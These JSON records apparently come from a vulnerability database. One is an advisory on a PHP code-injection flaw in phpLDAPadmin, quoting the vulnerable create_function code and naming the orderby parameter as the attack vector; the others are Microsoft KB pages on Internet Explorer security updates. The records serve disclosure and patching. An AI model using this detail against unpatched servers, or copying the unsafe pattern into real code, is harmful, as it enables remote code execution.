{"id": "SECURITYVULNS:DOC:27266", "bulletinFamily": "software", "title": "phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit", "description": "\r\nphpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit\r\n\r\n\r\nauthor...............: EgiX\r\nmail.................: n0b0d13s[at]gmail[dot]com\r\nsoftware link........: http://phpldapadmin.sourceforge.net/\r\naffected versions....: from 1.2.0 to 1.2.1.1\r\n\r\n\r\n[-] vulnerable code in /lib/functions.php\r\n\r\n1002. function masort(&$data,$sortby,$rev=0) {\r\n1003. if (defined('DEBUG_ENABLED') && DEBUG_ENABLED && (($fargs=func_get_args())||$fargs='NOARGS'))\r\n1004. debug_log('Entered (%%)',1,0,__FILE__,__LINE__,__METHOD__,$fargs);\r\n1005. \r\n1006. # if the array to sort is null or empty\r\n1007. if (! $data) return;\r\n1008. \r\n1009. static $CACHE = array();\r\n1010. \r\n1011. if (empty($CACHE[$sortby])) {\r\n1012. $code = "\$c=0;\n";\r\n1013. \r\n1014. foreach (explode(',',$sortby) as $key) {\r\n1015. $code .= "if (is_object(\$a) || is_object(\$b)) {\n";\r\n1016. \r\n1017. $code .= " if (is_array(\$a->$key)) {\n";\r\n1018. $code .= " asort(\$a->$key);\n";\r\n1019. $code .= " \$aa = array_shift(\$a->$key);\n";\r\n\r\n..\r\n\r\n1078. $code .= 'return $c;';\r\n1079. \r\n1080. $CACHE[$sortby] = create_function('$a, $b',$code);\r\n1081. }\r\n\r\nThe $sortby parameter passed to 'masort' function isn't properly sanitized before being used in a call to create_function()\r\nat line 1080, this can be exploited to inject and execute arbitrary PHP code. The only possible attack vector is when handling\r\nthe 'query_engine' command, here input passed through $_REQUEST['orderby'] is passed as $sortby parameter to 'masort' function.\r\n\r\n\r\n[-] Disclosure timeline:\r\n\r\n[30/09/2011] - Vulnerability discovered\r\n[02/10/2011] - Issue reported to http://sourceforge.net/support/tracker.php?aid=3417184\r\n[05/10/2011] - Fix committed: http://phpldapadmin.git.sourceforge.net/git/gitweb.cgi?p=phpldapadmin/phpldapadmin;h=76e6dad\r\n[23/10/2011] - Public disclosure\r\n\r\n\r\n[-] Proof of concept:\r\n\r\nhttp://www.exploit-db.com/exploits/18021/\r\n", "published": "2011-11-06T00:00:00", "modified": "2011-11-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27266", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:42", "history": [], "edition": 1, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "46986f23f14e5407c1138fc44b6dd98c"}, {"key": "href", "hash": "e2a64423f6668574020eebec8bc00056"}, {"key": "modified", "hash": "3b6acf0149003116c271e662401e5a72"}, {"key": "published", "hash": "3b6acf0149003116c271e662401e5a72"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a49ebb2e1a771348dfa0039e0d589df6"}, {"key": "title", "hash": "b6a6f3b3035bb5ca2182583bf011557a"}, {"key": "type", "hash": "d54751dd75af2ea0147b462b3e001cd0"}], "hash": "878948b05c99a54c2cb129748d2451244ef76f16b816e1a0ca60d331a0b0acb0", "viewCount": 3, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2018-08-31T11:10:42", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1489.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201446", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201473", "OPENVAS:1361412562311220201462", "OPENVAS:1361412562311220201477"]}], "modified": "2018-08-31T11:10:42", "rev": 2}, "vulnersScore": 3.0}, "objectVersion": "1.3", "affectedSoftware": []}

{"mskb": [{"lastseen": "2020-05-21T10:31:50", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-010. To view the complete security bulletin, visit one of the following Microsoft websites:<br/><ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201202.aspx\" id=\"kb-link-4\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201202.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-5\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-010\" id=\"kb-link-6\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-010</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-7\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-8\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-9\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-10\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2658489\" id=\"kb-link-11\">2658489 </a></td><td class=\"sbody-td\">Error message when you use Internet Explorer 9 to browse a webpage that uses the dialogArguments property for the showModalDialog method: \"Permission denied\"</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2711084\" id=\"kb-link-12\">2711084 </a></td><td class=\"sbody-td\">A memory leak occurs in Internet Explorer 8 when you open and then close a new window or tab that contains circular references that involve the window object </td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2647516 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2647516 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2647516, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-13\">897225 </a> <br/>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-14\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p>If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</li><li>Type <strong class=\"uiterm\">msinfo32.exe,</strong> and then press ENTER.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-17\">827218 </a><br/>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:51:32", "id": "KB2647516", "href": "https://support.microsoft.com/en-us/help/2647516/", "published": "2020-05-21T04:51:25", "title": "MS12-010: Cumulative Security Update for Internet Explorer: February 14, 2012", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:31:51", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\">The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><a href=\"http://windowsupdate.microsoft.com\" id=\"kb-link-2\" target=\"_self\">http://windowsupdate.microsoft.com</a></div>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a></div></div><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-057. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201108.aspx\" id=\"kb-link-5\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201108.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-6\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms11-057.mspx\" id=\"kb-link-7\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS11-057.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-8\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-9\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-10\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-11\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on your version of Windows and the version of the affected application. Please view the individual articles to determine your update status. <div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2591085\" id=\"kb-link-12\">2591085 </a></td><td class=\"sbody-td\">The Internet Explorer 9 option \"Ignore colors specified on webpages\" does not remove background images on webpages</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2589908\" id=\"kb-link-13\">2589908 </a></td><td class=\"sbody-td\">Internet Explorer takes a long time to open a message in Outlook Web App</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2589171\" id=\"kb-link-14\">2589171 </a></td><td class=\"sbody-td\">The Save As dialog box disappears and the file is not saved when you try to download a file in Internet Explorer 9 to a network share on which you have Change permissions</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2529406\" id=\"kb-link-15\">2529406 </a></td><td class=\"sbody-td\">Pictures on a webpage are only partly displayed in Internet Explorer 8 when both IPv4 native sites and IPv4/IPv6 dual-stack sites exist in the network </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2510901\" id=\"kb-link-16\">2510901 </a></td><td class=\"sbody-td\">Internet Explorer 8 may stop responding when you browse some webpages in Windows 7 or in Windows Server 2008 R2</td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2559049 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2559049 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2559049, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-17\">897225 </a> How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span>In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-18\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p>If you are not sure which version of Windows you are running or whether your version is a 32-bit or a 64-bit version, you should open System Information (Msinfo32.exe) and then review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong> and then press Enter.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-21\">827218 </a>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:46:04", "id": "KB2559049", "href": "https://support.microsoft.com/en-us/help/2559049/", "published": "2020-05-21T04:45:55", "title": "MS11-057: Cumulative Security Update for Internet Explorer: August 9, 2011", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:41:09", "bulletinFamily": "microsoft", "description": "<html><body><p>Resolves vulnerabilities in Internet Explorer that could allow remote code execution if a user views a specially crafted webpage by using Internet Explorer.</p><h2>Notice</h2><div class=\"kb-summary-section section\"> <br/>The update that this article describes has been replaced by a newer update. To resolve this problem, install the most current cumulative security update for Internet Explorer. To install the most current update, visit the following Microsoft website:<br/> <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-1\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a><br/></div> <br/> <br/>For more technical information about the most current cumulative security update for Internet Explorer, visit the following Microsoft website:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/current.aspx\" id=\"kb-link-2\" target=\"_self\">http://www.microsoft.com/technet/security/current.aspx</a><br/></div></div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS11-081. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201110.aspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201110.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or for your laptop from the Microsoft Update Website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-4\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms11-081\" id=\"kb-link-5\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS11-081</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-6\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-7\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-8\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-9\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Known issues with this security update</h3>After you install this security update, some drop-down lists and combo boxes do not appear in Internet Explorer 7.<br/><br/>If a webpage hosts another webpage that is in a different domain, and the hosted webpage has window restrictions enabled (default configuration) and contains a select control such as list or combo box when the hosting page tries to display the combo box or drop-down value from the hosted page, the combo box or list is not displayed.<br/><br/>For more information about\u00a0this problem, click the following article number to view the article in the Microsoft Knowledge Base:<div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2628724\" id=\"kb-link-10\">2628724 </a> Some drop-down lists and combo boxes do not appear in Internet Explorer 7 after you install security update 2586448</div><br/><br/>To resolve this problem, install security update 2618444. For more information, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2618444\" id=\"kb-link-11\">2618444 </a> <br/>MS11-099: Cumulative Security Update for Internet Explorer: December 13, 2011<br/><br/></div><h3 class=\"sbody-h3\">Non-security-related fixes that are included in this security update</h3><h4 class=\"sbody-h4\">General distribution release (GDR) fixes</h4>Individual updates may not be installed, depending on the version of Windows and the version of the affected application. Please view the individual articles to determine your update status.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Article number</th><th class=\"sbody-th\">Article title</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2575790\" id=\"kb-link-12\">2575790 </a></td><td class=\"sbody-td\">Internet Explorer 9 displays a password mask character for Japanese characters that is too large for a password entry box</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2607445\" id=\"kb-link-13\">2607445 </a></td><td class=\"sbody-td\">Download content is lost after you click the gold information bar to confirm a file download in Internet Explorer 8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601307\" id=\"kb-link-14\">2601307 </a></td><td class=\"sbody-td\">Navigation fails when you click a link that uses a custom pluggable protocol to browse to a secure site in Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601254\" id=\"kb-link-15\">2601254 </a></td><td class=\"sbody-td\">The IHTMLEventObj::put_keyCode property does not work in Internet Explorer 9 Standards mode</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2601253\" id=\"kb-link-16\">2601253 </a></td><td class=\"sbody-td\">You cannot change the font size in Windows Live Mail or in Windows Mail after you install Internet Explorer 9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2600932\" id=\"kb-link-17\">2600932 </a></td><td class=\"sbody-td\">An application that uses the web browser control in Internet Explorer may crash</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2534550\" id=\"kb-link-18\">2534550 </a></td><td class=\"sbody-td\">The window.createPopup method to create a modal window does not work with protected mode enabled in Internet Explorer 8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><a href=\"https://support.microsoft.com/en-us/help/2515657\" id=\"kb-link-19\">2515657 </a></td><td class=\"sbody-td\">Windows 7 gadgets may not work or be displayed correctly</td></tr></table></div><h4 class=\"sbody-h4\">Hotfixes</h4>Security update 2586448 packages for Windows XP and for Windows Server 2003 include Internet Explorer hotfix files and general distribution release (GDR) files. If no existing Internet Explorer files are from the hotfix environment, security update 2586448 installs the GDR files. <br/><br/>Hotfixes are intended to correct only the problems that are described in the Microsoft Knowledge Base articles that are associated with the hotfixes. Apply hotfixes only to systems that are experiencing these specific problems. <br/><br/>These hotfixes may receive additional testing. Therefore, if you are not severely affected by this problem, we recommend that you wait for the next service pack that contains these hotfixes. <span>For more information about how to install the hotfixes that are included in security update 2586448, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/897225\" id=\"kb-link-20\">897225 </a> <br/>How to install hotfixes that are included in cumulative security updates for Internet Explorer </div></span><br/><span class=\"text-base\">Note</span> In addition to installing hotfix files, review the Microsoft Knowledge Base article that is associated with the specific hotfix that you have to install to determine the registry modification that is required to enable that specific hotfix. <br/><br/><span>For more information about how to determine whether your existing Internet Explorer files are from the hotfix or from the GDR environment, click the following article number to view the article in the Microsoft Knowledge Base: <div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/824994\" id=\"kb-link-21\">824994 </a> <br/>Description of the contents of Windows XP Service Pack 2 and Windows Server 2003 software update packages </div></span></div><h2>How to determine whether you are running a 32-bit or a 64-bit edition of Windows</h2><p class=\"sbody-h3\">If you are not sure which version of Windows that you are running or whether it is a 32-bit version or 64-bit version, open System Information (Msinfo32.exe), and review the value that is listed for <strong class=\"uiterm\">System Type</strong>. To do this, follow these steps:</p><ol class=\"sbody-num_list\"><li><p>Click <strong class=\"uiterm\">Start</strong>, and then click <strong class=\"uiterm\">Run</strong>, or click <strong class=\"uiterm\">Start Search</strong>.</p></li><li>Type <strong class=\"uiterm\">msinfo32.exe</strong>, and then press Enter.</li><li>In <strong class=\"uiterm\">System Information</strong>, review the value for <strong class=\"uiterm\">System Type</strong>.<ul class=\"sbody-free_list\"><li>For 32-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x86-based PC</strong>.</li><li>For 64-bit editions of Windows, the <strong class=\"uiterm\">System Type</strong> value is <strong class=\"uiterm\">x64-based PC</strong>.</li></ul></li></ol><p><span>For more information about how to determine whether you are running a 32-bit or 64-bit edition of Windows, click the following article number to view the article in the Microsoft Knowledge Base:</span></p><div class=\"indent\"><span><a href=\"https://support.microsoft.com/en-us/help/827218\" id=\"kb-link-24\">827218 </a><br/>How to determine whether a computer is running a 32-bit version or a 64-bit version of the Windows operating system</span></div></body></html>", "modified": "2020-05-21T04:43:03", "id": "KB2586448", "href": "https://support.microsoft.com/en-us/help/2586448/", "published": "2020-05-21T04:42:54", "title": "MS11-081: Cumulative Security Update for Internet Explorer: October 11, 2011", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-21T10:29:51", "bulletinFamily": "microsoft", "description": "<html><body><p>Addresses vulnerabilities for Microsoft software that could allow remote code execution if a user views a specially crafted webpage that instantiates a specific ActiveX control in Internet Explorer.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-034. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/protect/computer/updates/bulletins/201006.mspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/protect/computer/updates/bulletins/201006.mspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-034.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/MS10-034.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Security update download packages</h3><span>The following files are available for download from the Microsoft Download Center:</span><h4 class=\"sbody-h4\">For Windows 7 for 32-bit systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/2/1/6/21616494-76c7-4d05-a573-bd4aa90e8460/windows6.1-kb980195-x86.msu\" id=\"kb-link-8\" target=\"_self\">Download the Windows6.1-KB980195-x86.msu package now.</a></span><h4 class=\"sbody-h4\">For Windows 7 for x64-based systems</h4><span><img alt=\"Download \" class=\"graphic\" src=\"/library/images/support/kbgraphics/public/en-us/download.gif\" title=\"Download \"/><a href=\"http://download.microsoft.com/download/1/a/0/1a0d4772-1ea8-436c-a103-55d4bdba744b/windows6.1-kb980195-x64.msu\" id=\"kb-link-9\" target=\"_self\">Download the Windows6.1-KB980195-x64.msu package now.</a></span><h4 